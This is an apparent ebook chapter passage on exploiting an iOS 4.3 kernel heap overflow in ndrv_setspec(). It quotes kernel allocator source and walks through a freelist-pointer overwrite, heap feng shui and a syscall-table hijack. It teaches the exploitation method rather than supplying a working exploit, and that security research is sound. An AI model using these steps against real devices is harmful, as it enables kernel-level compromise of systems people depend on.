Kernel-level heap buffer overflow vulnerabilities are caused by an unrestricted copy operation into a heap-based buffer. The result of such an overflow depends on the actual heap implementation and the surrounding memory blocks, which will determine if it can be used for exploitation and allow arbitrary code execution or controlled memory corruption. Similar to the lack of kernel space protections against stack-based buffer overflows, there are also no protections against heap-based buffer overflows inside the iOS kernel. The overall exploitation of heap-based buffer overflow is far more complex than the previously discussed problem types and requires a good understanding of the implementation of the heap allocator. But before we go into the actual exploitation, we will first introduce the vulnerability that was used within redsn0w to untether the iOS 4.3.1 to 4.3.3 jailbreaks.

The discussed vulnerability is located within the ndrv_setspec() function, which is defined in the file /bsd/net/ndrv.c. The actual vulnerability is not a simple heap-based buffer overflow, but an integer overflow in a multiplication that is used to calculate the amount of heap memory allocated. Because the user-supplied demux_count is not checked, the multiplication result will not fit into the 32-bit variable, and therefore the allocation returns a buffer that is too small, as you can see in the following code:

bzero(&proto_param, sizeof(proto_param));
proto_param.demux_count = ndrvSpec.demux_count;

/* Allocate storage for demux array */
MALLOC(ndrvDemux, struct ndrv_demux_desc*, proto_param.demux_count *
       sizeof(struct ndrv_demux_desc), M_TEMP, M_WAITOK);
if (ndrvDemux == NULL)
   return ENOMEM;

/* Allocate enough ifnet_demux_descs */
MALLOC(proto_param.demux_array, struct ifnet_demux_desc*,
       sizeof(*proto_param.demux_array) * ndrvSpec.demux_count,
       M_TEMP, M_WAITOK);
if (proto_param.demux_array == NULL)
   error = ENOMEM;

Both calls to _MALLOC() contain integer multiplications that overflow in case the demux_count is set to some value like 0x4000000a. Therefore, both buffers will be shorter than necessary for the supplied demux_count. The function continues copying data from user space into the ndrvDemux buffer. However, because the amount copied is calculated by the same formula, this doesn't result in a buffer overflow, because only the same amount of bytes will be copied as you can see here:

/* Copy the ndrv demux array from userland */
error = copyin(user_addr, ndrvDemux,
                    ndrvSpec.demux_count *
sizeof(struct ndrv_demux_desc));
ndrvSpec.demux_list = ndrvDemux;

The actual buffer overflow is hidden within a loop that converts the incoming data from user space into a kernel structure, which immediately follows this copy operation:

proto_param.demux_count = ndrvSpec.demux_count;
proto_param.input = ndrv_input;
proto_param.event = ndrv_event;

for (demuxOn = 0; demuxOn < ndrvSpec.demux_count; demuxOn++)
{
   /* Convert an ndrv_demux_desc to a ifnet_demux_desc */
   error = ndrv_to_ifnet_demux(&ndrvSpec.demux_list[demuxOn],
                               &proto_param.demux_array[demuxOn]);
   if (error)
      break;
}

You can see that the loop will continue to convert until everything is converted or an error is triggered. It should be obvious that you need to trigger this error somehow, because otherwise the amount copied will be too large and lead to a kernel crash. This is no problem, which you will see when you look into the conversion function ndrv_to_ifnet_demux(). But before you do this, look into the implementation of the kernel heap.

Kernel Heap Zone Allocator

To understand how a buffer overflow inside the kernel heap leads to exploitable situations, it is necessary to look into the implementation of the kernel heap. Multiple kernel heap implementations exist within the iOS kernel, but we discuss only the most analyzed one. The allocator we dissect is called the zone allocator and is the most commonly used one within iOS. It is defined within the file /osfmk/kern/zalloc.c and used through the zalloc(), zalloc_canblock(), and zfree() functions. In many cases, it is not used directly, but through a wrapper function. The most common usage is through the _MALLOC() function that calls kalloc() for the actual allocation. kalloc() wraps around two different allocators and chooses between them depending on the size of the allocated block. Smaller blocks are allocated through zalloc() and larger blocks are allocated through the kmem_alloc() function.

Before you look into the actual implementation of the zone allocator, have a look into the wrappers, because they are already interesting by themselves. The _MALLOC() function is defined within the file /bsd/kern/kern_malloc.c. It is special because it adds a header to the allocated data, which contains the size of the block. This is required, because it uses the kalloc()/kfree() functions internally and both of these need to get the size of the block passed.

void *
_MALLOC(
      size_t size,
      int    type,
      int    flags)
{
   struct _mhead *hdr;
   size_t        memsize = sizeof (*hdr) + size;

   if (type >= M_LAST)
      panic("_malloc TYPE");

   if (size == 0)
      return (NULL);

   if (flags & M_NOWAIT) {
      hdr = (void *)kalloc_noblock(memsize);
   } else {
      hdr = (void *)kalloc(memsize);

      if (hdr == NULL) {
         panic("_MALLOC: kalloc returned NULL (potential leak),
size %llu",
               (uint64_t) size);
      }
   }
   if (!hdr)
      return (0);

   hdr->mlen = memsize;

   if (flags & M_ZERO)
      bzero(hdr->dat, size);

   return  (hdr->dat);
}

The most interesting part of this function is the possible integer overflow in the allocation that is triggered when 0xFFFFFFFC or more bytes are allocated. This could be triggered in several different places in the past; however, Apple silently fixed this vulnerability in iOS 5.0. Now _MALLOC() detects the possible integer overflow and returns NULL or panics, depending on the M_NOWAIT flag.

Nevertheless, _MALLOC() is just a wrapper around kalloc(), which is a bit more complicated, because it wraps two different kernel heap allocators. It is defined within the file /osfmk/kern/kern_alloc.c. We show only the relevant parts that involve the zone allocator, because the kmem_alloc() allocator has not been analyzed, yet:

void *
kalloc_canblock(
      vm_size_t size,
      boolean_t canblock)
{
   register int zindex;
   register vm_size_t allocsize;
   vm_map_t alloc_map = VM_MAP_NULL;

   /*
    * If size is too large for a zone, then use kmem_alloc.
    */

   if (size >= kalloc_max_prerounded) {
      ...
   }

   /* compute the size of the block that we will actually allocate */

   allocsize = KALLOC_MINSIZE;
   zindex = first_k_zone;
   while (allocsize < size) {
      allocsize <<= 1;
      zindex++;
   }

   /* allocate from the appropriate zone */
   assert(allocsize < kalloc_max);
   return(zalloc_canblock(k_zone[zindex], canblock));
}

In iOS 4, kalloc() registered different zones for each power of 2 between 16 and 8192. Since iOS 5.0, there are a few additional zones registered for the sizes 24, 40, 48, 88, 112, 192, 384, 786, 1536, 3072, and 6144. It is assumed that these zones were added because they represent often requested memory sizes. When memory is allocated, it is allocated into the smallest zone into which it fits completely. This means a block of size 513 will end up in the 1024 bytes zone for iOS 4 and in the 786 bytes zone for iOS 5.

After digging through all these wrappers, you finally get to the heart of the zone allocator and can analyze its internal implementation. The allocator is called zone allocator because it organizes memory in zones. Within a zone, all memory blocks are of the same size. For most kernel objects there is even a dedicated zone that collects all memory blocks of the same structure type. Such zones include socket, tasks, vnodes, and kernel_stacks. Other general-purpose zones, like those registered by kalloc(), are called kalloc.16 to kalloc.8192. On iOS and Mac OS X you can retrieve a full list of zones with the /usr/bin/zprint tool. A zone is described by its zone structure:

struct zone {
   int count;                                 /* Number of elements used now */
   vm_offset_t free_elements;
   decl_lck_mtx_data(,lock)                                     /* zone lock */
   lck_mtx_ext_t lock_ext;                 /* placeholder for indirect mutex */
   lck_attr_t lock_attr;                              /* zone lock attribute */
   lck_grp_t lock_grp;                                    /* zone lock group */
   lck_grp_attr_t lock_grp_attr;                /* zone lock group attribute */
   vm_size_t cur_size;                         /* current memory utilization */
   vm_size_t max_size;                       /* how large can this zone grow */
   vm_size_t elem_size;                                /* size of an element */
   vm_size_t alloc_size;                        /* size used for more memory */
   uint64_t sum_count;                     /* count of allocs (life of zone) */
   unsigned int
   /* boolean_t */ exhaustible :1,            /* (F) merely return if empty? */
   /* boolean_t */ collectable :1,        /* (F) garbage collect empty pages */
   /* boolean_t */ expandable :1,         /* (T) expand zone (with message)? */
   /* boolean_t */ allows_foreign :1,          /* (F) allow non-zalloc space */
   /* boolean_t */ doing_alloc :1,                 /* is zone expanding now? */
   /* boolean_t */ waiting :1,           /* is thread waiting for expansion? */
   /* boolean_t */ async_pending :1,     /* asynchronous allocation pending? */
   /* boolean_t */ caller_acct: 1,    /* do we account alloc/free to caller? */
   /* boolean_t */ doing_gc :1,              /* garbage collect in progress? */
   /* boolean_t */ noencrypt :1;
   int index;                   /* index into zone_info arrays for this zone */
   struct zone   * next_zone;                     /* Link for all-zones list */
   call_entry_data_t call_async_alloc;     /* callout for asynchronous alloc */
   const char *zone_name;                             /* a name for the zone */
};

All zones are kept in a single linked list that connects to the next element through the next_zone pointer. A zone keeps track of the number of currently allocated elements and the amount of currently assigned memory. It does not keep track of the address of the pages belonging to a zone. In addition to that, a number of fields contain the configuration of the zone: the size of elements, the maximum size of the zone, and the amount of memory the zone grows whenever it is full. A bitfield within the structure configures whether a zone can support garbage collection, disable auto growing, or is exempt from encryption.

The free_elements pointer within the structure hints at the fact that all free elements of a zone are kept in a linked list. The connection pointer to the next element of the freelist is stored in the beginning of a free block. When memory is allocated, the first element of the freelist is reused and the head of the freelist is replaced by the next element. If the freelist is empty, the zone is enlarged. When a page is added to the zone or when the zone is initially created, the new memory blocks are put on the freelist one after another. Therefore, the freelist contains the memory blocks of a page in reverse order.

When zalloc() is used to allocate an element, it is taken from the freelist by using the REMOVE_FROM_ZONE macro. This macro reads the pointer to the next element of the freelist from the start of the free block, sets it as the new head of the freelist, and returns the previous head of the freelist as the allocated block:

#define REMOVE_FROM_ZONE(zone, ret, type)                                      
MACRO_BEGIN                                                                   
   (ret) = (type) (zone)->free_elements;                                      
   if ((ret) != (type) 0) {                                                   
      if (check_freed_element) {                                              
         if (!is_kernel_data_addr(((vm_offset_t *)(ret))[0]) ||               
                           ((zone)->elem_size >= (2 * sizeof(vm_offset_t)) && 
             ((vm_offset_t *)(ret))[((zone)->elem_size/sizeof(vm_offset_t))-1]
                  != ((vm_offset_t *)(ret))[0]))                              
            panic("a freed zone element has been modified");                   
         if (zfree_clear) {                                                   
            unsigned int ii;                                                  
            for (ii = sizeof(vm_offset_t) / sizeof(uint32_t);                 
                 ii < (zone)->elem_size/sizeof(uint32_t)                      
                 - sizeof(vm_offset_t) / sizeof(uint32_t); ii++)              
            if (((uint32_t *)(ret))[ii] != (uint32_t)0xdeadbeef)              
               panic("a freed zone element has been modified");                
         }                                                                    
      }                                                                       
      (zone)->count++;                                                        
      (zone)->sum_count++;                                                    
      (zone)->free_elements = *((vm_offset_t *)(ret));                        
   }                                                                          
MACRO_END

The majority of the macro performs checks of the free element and the freelist. These checks are meant to detect kernel heap corruption, but are conditionally executed and not activated by default. To activate them, the iOS kernel must be booted with the special boot arguments –zc and –zp. From the latest source code of Mac OS X Lion, it seems that Apple was experimenting with activating these features by default. For now they are still deactivated, which is most probably due to performance reasons.

Because there are no activated security checks in an iOS kernel by default and because the freelist is stored inbound, the exploitation of heap overflows within the iOS kernel is very similar to exploitation on other platforms from many years ago. By overflowing the end of an allocated block into an adjacent free block, it is possible to overwrite and therefore replace the pointer to the next element in the freelist. When the overwritten free block later becomes the head of the freelist, the next invocation of zalloc()returns it and makes the overwritten pointer the new head of the freelist. The next allocation that follows therefore returns an attacker-supplied pointer. Because this pointer can point anywhere in memory, this can lead to arbitrary memory overwrites, depending on how the kernel code uses the returned memory. In the public exploit for the ndrv vulnerability this is used to overwrite the system call handler 207, which allows arbitrary kernel code execution.

Kernel Heap Feng Shui

Just like in user space heap exploitation, the biggest problem when exploiting a heap is that it is initially in an unknown state at the time of exploitation. This is bad, because successfully exploiting a heap overflow requires you to control the position of the overflowing block in relation to a free block that will be overwritten. To achieve this, several different techniques have been developed. Traditionally, heap spraying was used in heap overflow exploits to fill the heap with enough blocks, so that the probability of overwriting interesting blocks was very high. This was very unreliable and had to be improved. Therefore, a more sophisticated technique was developed, which allows for far more reliable exploits. This technique is now widely known as heap feng shui, and was discussed in Chapter 7.

Recall that this technique is a simple multi-step process that tries to bring a heap into an attacker-controlled state. To execute this process within a kernel exploit, you first need a way to allocate and deallocate memory blocks of arbitrary sizes from user space. This means you need to scan all the reachable kernel functionality for functions that allow you to allocate and free an attacker-supplied amount of memory. For the ndrv_setspec() vulnerability you can find these within the same file. The function ndrv_connect() is the handler that is called when an ndrv socket is connected. It allows you to allocate different amounts of kernel memory by supplying socket names of different lengths.

static int
ndrv_connect(struct socket *so, struct sockaddr *nam, _unused struct proc *p)
{
   struct ndrv_cb *np = sotondrvcb(so);

   if (np == 0)
      return EINVAL;

   if (np->nd_faddr)
      return EISCONN;
   
   /* Allocate memory to store the remote address */
   MALLOC(np->nd_faddr, struct sockaddr_ndrv*,
          nam->sa_len, M_IFADDR, M_WAITOK);
   if (np->nd_faddr == NULL)
      return ENOMEM;
   
   bcopy((caddr_t) nam, (caddr_t) np->nd_faddr, nam->sa_len);
   soisconnected(so);
   return 0;
}

The opposite operation, the deallocation from user space, is reachable by calling close() on the connected socket, to disconnect it again. This is implemented in the ndrv_do_disconnect() function:

static int
ndrv_do_disconnect(struct ndrv_cb *np)
{
   struct socket * so = np->nd_socket;
#if NDRV_DEBUG
   kprintf("NDRV disconnect: %x
", np);
#endif
   if (np->nd_faddr)
   {
      FREE(np->nd_faddr, M_IFADDR);
      np->nd_faddr = 0;
   }
   if (so->so_state & SS_NOFDREF)
      ndrv_do_detach(np);
   soisdisconnected(so);
   return(0);
}

Now that you have established how to allocate and deallocate kernel memory from user space, you can use this for executing the heap feng shui technique. This technique assumes that you start with a heap in an unknown state, which basically means there are a number of allocated blocks and a number of empty holes of different sizes. Neither the position of the allocated blocks, nor the number of holes, is known. An exploit based on the heap feng shui technique then proceeds as follows:

1. Allocate enough memory blocks so that all “holes” get closed. The exact number of required allocations is usually unknown.
2. Allocate more memory blocks so that these will all be adjacent to each other in memory.
3. Free two adjacent memory blocks. The order depends on the freelist implementation. The next allocation should return the block that comes first in memory.
4. Trigger a vulnerable kernel function that will allocate the first of the two blocks and overflow into the following free block.
5. Trigger some kernel functionality that allocates the overwritten free block and makes the overwritten pointer the head of the freelist.
6. Trigger more functionality that will allocate memory, and therefore use the attacker-supplied pointer instead of a real memory block.
7. Use this arbitrary memory overwrite to overwrite some function pointer, like an unused handler in the system call table.
8. Trigger the overwritten system call to execute arbitrary code in kernel space.

Although the first step is based on a guessed amount of allocations, exploits based on heap feng shui are usually very stable. However, within Mac OS X and iOS there exists a gift from kernel space that helps to improve on this little uncertainty.

Detecting the State of the Kernel Heap

Both Mac OS X and iOS come with a very interesting and useful mach trap called host_zone_info(). This method can be used to query information about the state of all registered zones from the kernel's zone allocator. This function is not limited to the root user and is used, for example, internally by the /usr/bin/zprint utility that comes preinstalled with Mac OS X. For every zone, it returns information in the form of a filled out zone_info struct:

typedef struct zone_info {
   integer_t  zi_count;         /* Number of elements used now */
   vm_size_t  zi_cur_size;      /* current memory utilization */
   vm_size_t  zi_max_size;      /* how large can this zone grow */
   vm_size_t  zi_elem_size;     /* size of an element */
   vm_size_t  zi_alloc_size;    /* size used for more memory */
   integer_t  zi_pageable;      /* zone pageable? */
   integer_t  zi_sleepable;     /* sleep if empty? */
   integer_t  zi_exhaustible;   /* merely return if empty? */
   integer_t  zi_collectable;   /* garbage collect elements? */
} zone_info_t;

Although the information that can be retrieved through this mach trap does not leak any internal kernel memory addresses, it still allows a deep insight into the state of the kernel zone allocator. The field zi_count contains the number of currently allocated memory blocks in a zone. Because certain kernel structures are stored in their own zones, this counter might also allow you to deduce other information such as the number of running processes or open files.

For a kernel heap overflow, it is more interesting to subtract this value from the maximum number of elements. The maximum number is calculated by dividing the current size zi_cur_size by the size of a single element zi_elem_size. This number reveals the number of free blocks in a zone, which is equal to the number of memory holes that need to be closed for the heap feng shui technique. In iOS and Mac OS X, it is therefore possible to calculate the exact number of necessary allocations that close all holes in a zone.

When the maximum number of elements within a zone is exhausted, the zone is grown by adding a new block of zi_alloc_size bytes. This freshly allocated memory block is then divided into the separate memory blocks and each is put into the zone's freelist. This is important because it reverses the order of allocation, and also means that only memory blocks that were added within the same grow operation will be adjacent to each other in the zone.

Exploiting the Kernel Heap Buffer Overflow

Now that you know the theory behind kernel heap buffer overflow exploitation, it is time to get back to the example vulnerability and explain its exploitation. You have to remember that the actual heap-based buffer overflow is caused by repeatedly calling the ndrv_to_ifnet_demux() function until you overflow the actual buffer and exit the loop by triggering one of the internal error conditions:

int
ndrv_to_ifnet_demux(struct ndrv_demux_desc* ndrv,
                    struct ifnet_demux_desc* ifdemux)
{
    bzero(ifdemux, sizeof(*ifdemux));
   
    if (ndrv->type < DLIL_DESC_ETYPE2)
    {
        /* using old "type", not supported */
        return ENOTSUP;
    }
   
    if (ndrv->length > 28)
    {
        return EINVAL;
    }
   
    ifdemux->type = ndrv->type;
    ifdemux->data = ndrv->data.other;
    ifdemux->datalen = ndrv->length;
   
    return 0;
}

This function takes an ndrv_demux_desc structure from user space and converts it into an ifnet_demux_desc structure for kernel space. These structures are defined as follows:

struct ndrv_demux_desc
{
    u_int16_t   type;
    u_int16_t   length;
    union
    {
        u_int16_t   ether_type;
        u_int8_t    sap[3];
        u_int8_t    snap[5];
        u_int8_t    other[28];
    } data;
};
struct ifnet_demux_desc {
    u_int32_t   type;
    void        *data;
    u_int32_t   datalen;
};

The definition of these structures shows that you are limited in what you can write to the overflowing buffer. The type field can be filled only with 16-bit values larger than DLIL_DESC_ETYPE2, which is defined as 4. The datalen field can only be smaller than 29, and the data field will be a pointer into the structure copied from user space. This is quite limited, but your goal is to overwrite a pointer to the next element of the freelist. You, therefore, can construct the exploit in a way that the data pointer within an ifnet_demux_desc structure overflows the address of the next block in the freelist. This means that once the free block becomes the head of the freelist, the next allocation returns a memory block that is within the structure copied from user space. Because you control the content of that memory, you also control the first four bytes, which are assumed to be a pointer to the next block in the freelist. Therefore, you control the new head of the freelist. You let it be an address inside the system call table. The next allocation then returns the address inside the system call table. You make the kernel fill it with data you control. This results in arbitrary kernel code execution, after you call the overwritten system call handler.

Because you are limited in what you can write, the exploit is a bit more complicated than a normal heap-based buffer overflow. However, because you can write a pointer to data you control, you just have to add an additional step so that you control the head of the freelist after two, instead of one, allocations. The full source code of this exploit, including a kernel patch that forward-ports this vulnerability into current kernels for experimentation purposes, is available at http://github.com/stefanesser/ndrv_setspec.

Summary

In this chapter you stepped into the kernel space of iOS for the first time within this book. We covered different topics about kernel exploit development, from extracting and decrypting the kernel binary at first, up to achieving arbitrary code execution at kernel level.

We introduced you to reversing IOKit kernel drivers contained within the kernel binary and discussed how to find interesting kernel code that should be audited for vulnerabilities. We showed you how the iOS kernel can be remotely debugged with another computer and the KDP protocol, for easier kernel exploit development.

We also walked you through the exploitation of different types of kernel vulnerabilities, including the exploitation of arbitrary memory overwrites, uninitialized kernel variables, stack-based buffer overflows, and finally, heap-based buffer overflows inside kernel space.

Finally, we discussed the implementation and exploitation of the kernel's zone heap allocator and demonstrated how the heap feng shui technique is used in kernel-level heap buffer overflow exploits.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset